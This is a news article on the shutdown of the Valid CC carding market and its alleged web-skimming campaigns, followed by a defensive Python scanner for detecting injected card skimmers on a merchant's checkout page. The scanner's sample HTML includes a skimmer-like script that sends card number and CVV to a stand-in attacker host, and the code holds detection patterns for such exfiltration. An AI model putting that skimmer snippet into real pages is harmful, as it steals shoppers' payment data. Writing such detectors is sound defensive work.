Valid CC, a dark web market run by a cybercrime group, had been hacking online merchants and stealing payment credentials for more than six years. Last week, Valid CC closed down abruptly. The owners of Valid CC say that a law enforcement operation seized their servers, aiming to capture the store’s infrastructure. A number of online shops sell “card not present” (CNP) payment data on the internet. Such payment data may be stolen directly from e-commerce stores, but it is mostly sourced from other cybercriminals and threat actors.
In the case of Valid CC, however, experts believe that the store itself attacked and hacked hundreds of e-commerce merchants. The hackers seeded websites with hidden card-skimming code that stole personal information and payment credentials when a customer reached the checkout stage.
Group-IB, a Russia-based cybersecurity firm, published a report last year describing the operations of Valid CC and holding it responsible for hacking around 700 e-commerce stores. Group-IB also identified another group, “UltraRank”, responsible for attacking an additional 13 third-party suppliers that provided software components to these online stores across Europe, America, and Asia.
Experts believe that UltraRank orchestrated a series of cyberattacks that cybersecurity firms had earlier attributed to three different cybercrime groups. “Over five years … UltraRank changed its infrastructure and malicious code on numerous occasions, as a result of which cybersecurity experts would wrongly attribute its attacks to other threat actors,” said Group-IB, adding that “UltraRank combined attacks on single targets with supply chain attacks.”
Valid CC’s front man on various platforms, a hacker who goes by the handle SPR, notified customers that the shop would shut down from 28 January, following a law enforcement operation that sealed off Valid CC’s operations.
According to SPR, Valid CC lost access to more than 600,000 unsold payment card accounts, a very heavy blow to the store’s inventory. SPR also says that Valid CC lost its proxy and destination servers and now cannot open and decrypt its back end.
Group-IB reports, “the store’s official representative on underground forums is a user with the nickname SPR. In many posts, SPR claims that the card data sold in the ValidCC store was obtained using JS sniffers. Most of SPR’s posts are written in English; however, SPR often switches to Russian while communicating with customers. This might indicate that ValidCC is probably managed by a Russian speaker.”
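The skimming technique described above (hidden card-skimming code injected into a checkout page, referred to as “JS sniffers” in the Group-IB quote) is something a merchant can look for in their own page source. The following scanner is an added example written for this article; it is not code from the article, from Group-IB or from any of the parties mentioned. It assumes you can export the HTML of your own checkout page, and the scoring weights, regular expressions, hostnames and the sample page are all constructed assumptions for illustration. It flags inline scripts that read card form fields and send data to a host outside the shop’s own domain, and third-party scripts loaded without Subresource Integrity, which is the inclusion path a supplier compromise of the kind the article mentions would use.

```python
"""Heuristic scanner for injected card-skimming ("JS sniffer") code in a checkout page.
Added example, not code from the article or Group-IB. Patterns, weights and the
sample HTML below are constructed assumptions, not indicators from any real case."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Indicator patterns (assumed heuristics): reads of card fields, network sends,
# encoding/obfuscation helpers, and absolute URLs whose host we compare to the shop's.
CARD_FIELD_RE = re.compile(r"(card[_-]?num|ccnum|cvv|cvc|expir|exp[_-]?(month|year))", re.I)
EXFIL_RE = re.compile(r"(new\s+Image\s*\(|XMLHttpRequest|fetch\s*\(|sendBeacon|\.src\s*=)", re.I)
OBFUSC_RE = re.compile(r"(fromCharCode|atob\s*\(|btoa\s*\(|unescape\s*\(|\\x[0-9a-f]{2})", re.I)
URL_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)


def _is_first_party(host, site_host):
    """True when host is the shop's own domain or a subdomain of it."""
    host = (host or "").lower()
    return host == site_host or host.endswith("." + site_host)


class _ScriptCollector(HTMLParser):
    """Collects inline <script> bodies (with their line numbers) and external script tags."""

    def __init__(self):
        super().__init__()
        self.inline = []    # (line_no, body)
        self.external = []  # (src, has_integrity_attribute)
        self._in_script = False
        self._buf = []
        self._line = 0

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.external.append((a["src"], "integrity" in a))
        else:
            self._in_script, self._buf, self._line = True, [], self.getpos()[0]

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self.inline.append((self._line, "".join(self._buf)))
            self._in_script = False


def score_inline_script(body, site_host):
    """Score one inline script body; returns (score, reasons)."""
    score, reasons = 0, []
    if CARD_FIELD_RE.search(body):
        score += 2; reasons.append("reads card form fields")
    if EXFIL_RE.search(body):
        score += 1; reasons.append("performs a network send")
    if OBFUSC_RE.search(body):
        score += 1; reasons.append("uses encoding/obfuscation helpers")
    foreign = sorted({h.lower() for h in URL_RE.findall(body) if not _is_first_party(h, site_host)})
    if foreign:
        score += 2; reasons.append("contacts foreign host(s): " + ", ".join(foreign))
    return score, reasons


def scan_checkout_html(html, site_host, threshold=4):
    """Return a list of findings for scripts at or above the (assumed) threshold."""
    collector = _ScriptCollector()
    collector.feed(html)
    findings = []
    for line, body in collector.inline:
        score, why = score_inline_script(body, site_host)
        if score >= threshold:
            findings.append({"kind": "inline", "line": line, "score": score, "reasons": why})
    for src, has_sri in collector.external:
        if not _is_first_party(urlparse(src).hostname, site_host) and not has_sri:
            findings.append({"kind": "external", "src": src, "score": threshold,
                             "reasons": ["third-party script without Subresource Integrity"]})
    return findings


# Constructed sample checkout page: one benign inline script, one skimmer-like inline
# script, one first-party script with SRI (placeholder hash) and one third-party without.
SAMPLE_HTML = """<html><head>
<script src="https://cdn.example-shop.test/app.js" integrity="sha384-PLACEHOLDER"></script>
<script src="https://static.thirdparty.test/widget.js"></script>
</head><body>
<form id="checkout"><input id="cardNumber"><input id="cvv"></form>
<script>
  document.getElementById('checkout').addEventListener('submit', function () {
    console.log('validating order');
  });
</script>
<script>
  var d = document.getElementById('cardNumber').value + '|' + document.getElementById('cvv').value;
  new Image().src = 'https://collector.example-bad.test/p?x=' + btoa(d);
</script>
</body></html>"""

if __name__ == "__main__":
    for f in scan_checkout_html(SAMPLE_HTML, "example-shop.test"):
        print(f)
```

Run it against an exported copy of your own checkout page and treat any finding as a prompt to diff the page against a known-good deployment. The scores are coarse on purpose: a legitimate payment widget will also read card fields and talk to its processor, so the useful signal is a script that does so and was not in the last release, or a third-party include that has no integrity attribute and could be swapped at the supplier.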